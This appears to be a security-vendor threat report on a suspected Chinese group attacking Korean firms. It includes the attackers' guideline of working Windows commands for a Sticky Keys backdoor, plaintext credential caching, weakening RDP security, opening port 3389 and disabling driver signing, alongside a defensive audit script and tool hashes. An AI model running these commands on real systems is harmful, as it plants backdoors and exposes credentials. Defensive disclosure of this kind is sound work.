Chinese Hacker Group Stealing Information From Korean Companies

Recently, there have been frequent cases of attacks targeting vulnerable servers that are accessible externally, such as SQL servers or IIS web servers.

The team has confirmed two affected companies in this case: a semiconductor company and a smart manufacturing company that uses artificial intelligence. The threat group behind the attack is assumed to be a Chinese hacker group such as Xiaoqiying or Dalbit, because a text file written in Chinese containing instructions on how to use the hacking tool was found.

Chinese Hacker Group’s Guideline

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "\"c:\windows\system32\cmd.exe\" /z" /f
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0 /f

!! Disable driver signature enforcement: run cmd as administrator and execute the following command

Win2012 Can:
bcdedit.exe /set nointegritychecks on

\Easy File Locker (!!! Note: only grant the Access permission, nothing else; remember this)

Delete 1. REG delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Easy file Locker" /f
Delete 2: the installation directory
Delete 3: C:\Users\master\AppData\Roaming\Microsoft\Windows\Start Menu\Programs (shortcut)

C:/Users/Public/Documents/EFL/rule.ini (the hiding settings are stored here)
Add the files to be hidden in Easy File Locker and grant only the access permission; this hides the files.

cmd.exe /c reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f
cmd.exe /c wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
cmd.exe /c netsh advfirewall firewall add rule name="RemoteDesktop_Allow" dir=in protocol=TCP action=allow localport=3389 remoteip=any

1.reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f \configure port 3389
2.wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 (open terminal, 0 close)
netsh advfirewall firewall add rule name="RemoteDesktop_Allow" dir=in protocol=TCP action=allow localport=3389 remoteip=any
4.netsh advfirewall firewall show rule name="RemoteDesktop_Allow"
5. netsh advfirewall firewall del rule name="RemoteDesktop_Allow"

reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "\"c:\windows\system32\cmd.exe\" /z" /f
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0 /f
Table 1. Text file containing the guideline for the hacking tool used by the hacker group
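The following PowerShell audit is an added example and not part of the ASEC post: it checks a host for the registry, firewall, boot-option and file changes that the guideline above applies, so a defender can quickly confirm or rule out this tampering. It assumes the exact value names, the firewall rule name "RemoteDesktop_Allow" and the Easy File Locker rule path as they appear in Table 1, and an English-locale bcdedit output.

```powershell
# Added example (not from the ASEC post): audit a Windows host for the
# configuration changes listed in the threat actor's guideline (Table 1).
# Run in an elevated PowerShell session. Each finding is a lead to verify.

$findings = New-Object System.Collections.Generic.List[string]

function Get-RegValue([string]$Path, [string]$Name) {
    # Returns $null when the key or the value does not exist
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return $item.$Name
}

# 1. WDigest plaintext credential caching turned on (UseLogonCredential = 1)
$wdigest = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
if ((Get-RegValue $wdigest 'UseLogonCredential') -eq 1) {
    $findings.Add('WDigest UseLogonCredential=1: LSASS keeps plaintext credentials')
}

# 2. Image File Execution Options debugger attached to sethc.exe (Sticky Keys)
$ifeo = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe'
$debugger = Get-RegValue $ifeo 'Debugger'
if ($debugger) { $findings.Add("IFEO Debugger on sethc.exe: $debugger") }

# 3. RDP hardening rolled back: NLA off and legacy RDP security layer
$rdp = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'
if ((Get-RegValue $rdp 'UserAuthentication') -eq 0) {
    $findings.Add('RDP-Tcp UserAuthentication=0: Network Level Authentication disabled')
}
if ((Get-RegValue $rdp 'SecurityLayer') -eq 0) {
    $findings.Add('RDP-Tcp SecurityLayer=0: TLS no longer required for RDP')
}

# 4. Inbound firewall rule with the exact name used in the guideline
if (Get-NetFirewallRule -DisplayName 'RemoteDesktop_Allow' -ErrorAction SilentlyContinue) {
    $findings.Add('Firewall rule "RemoteDesktop_Allow" present (inbound TCP/3389 from any)')
}

# 5. Driver signature enforcement disabled on the current boot entry (English locale output)
$bcd = (& bcdedit.exe /enum '{current}' 2>$null) -join "`n"
if ($bcd -match 'nointegritychecks\s+Yes') { $findings.Add('bcdedit nointegritychecks=Yes') }

# 6. Easy File Locker rule file that the guideline uses to hide the tools
$eflRules = 'C:\Users\Public\Documents\EFL\rule.ini'
if (Test-Path $eflRules) { $findings.Add("Easy File Locker rule file present: $eflRules") }

if ($findings.Count -eq 0) { 'No indicators from the guideline were found.' }
else { $findings | ForEach-Object { "[!] $_" } }
```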

Threat Actor’s Server and Exfiltrated Information

The servers confirmed to be used by the threat actor are as follows:

FRP Management Server

Figure 1. Threat actor’s FRP panel

The threat actor installed FRP on the servers of the affected companies. The panel shown in Figure 1 therefore lists the infected PCs on which FRP is installed and the proxy servers used by the threat actor.

Previous blog posts, including one on the 'Dalbit' APT group, as well as the AhnLab TIP service's 'Analysis Report on Attack Cases Exploiting Various Remote Control Tools', have provided detailed coverage of attack methods that utilize FRP.

Dalbit (m00nlight): Chinese Hacker Group’s APT Attack Campaign
Attackers Using FRP (Fast Reverse Proxy) to Attack Korean Companies

File Server

Figure 2. Threat actor’s file server and log file

This server holds hacking tools such as Cobalt Strike, VPN and remote control tools, as well as many log files. As shown in Figure 2, the log files are stored in directories named with numbers. The stolen logs contain credential and network information alongside what is assumed to be internal material from the companies.

Figure 3. A portion of the information contained within the log (LogFile.txt) exfiltrated between March and April 2023
Figure 4. Stolen ID and PW information (assumed)

Threat Actor Tools & IOC

The tools used by the threat actor and the tools found on their server are as follows:

WebShell

Behinder
f8de2e99dc7523d2c83d1a48e844c5ff
77d507d30a155cf315f839db3bf507f7

Aspxspy
dd634ebfba56c1a898c4156ffdea146d

Godzilla
ed6ef17783c667c0c894e6cf7c71c54a
e5b626c4b172065005d04205b026e446

IceSword
a0301c680b257516090e336ca4e29167

Credential Access

Mimikatz
825e6e194a9d5e12cbf109b7de07a244
6c9ad4e67032301a61a9897377d9cff8
bb8bdb3e8c92e97e2f63626bc3b254c4
29efd64dd3c7fe1e2b022b7ad73a1ba5

Impacket (Secretsdump)
a7b705e4fb473e7ce32a495b079017b2

Network Scanning

SharpHound
12c70eefa2edba8b420a6d00891c792b
c541c44f41d953899d5734dd1d3b1d78

PortScan
41b61b87cf54821a45e8cf2cbfc852f8

FScan
32421a007f28aacf869a46f714945ad0

Persistence

NSSM
beceae2fdc4f7729a93e94ac2ccd78cc

Lateral Movement

PSexec
421116e8b522898f9d8e1651a8315705

Impacket (WMIExec)
e663e4b83089087d0a7989365b3513c4

RemCom
6983f7001de10f4d19fc2d794c3eb534

Proxy and VPN Tool

FRPC
7d9c233b8c9e3f0ea290d2b84593c842
2eead3e509a19002d80f48d431922f1e

FRPC INI (Configuration file)
61616e8948de1bf2b62a34854d655dea
e5273f435c8eab59bc5dbaa5ac11da7b

VPN Gate
e74130971e6f3c3caf56d862a39e750f

PulseSecure
8f9da1466cb5415a45a512341549b12e

Remote Access Tool

CobaltStrike
5e4fdc376f7dda3744bc331352bbe231
968931d2608f997866e07ce777b41636
2ad284b957ab28277fef534b3698c006

Ladon
006e7290fbae946551f07f6e0319d5de
b3b2c45aef41d94e7491d049d33c56c0

DameWare NT (Remote Control)
b10040dcd1583dadc4bf357eec22a18f

TeamViewer
b71d75f8f79e86add3fdece2c871e34c

ToDesk
7031441687a9548f1a7a08eb1e56f66b

ETC

note.txt (Original guideline file in Chinese)
a0ac0624926bfbbf196050783dfbc019

The threat actor's C2 server is still accessible, and some information from the affected companies is currently exposed on it, so it will not be disclosed here in order to prevent additional harm.

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.


Article Link: Chinese Hacker Group Stealing Information From Korean Companies - ASEC BLOG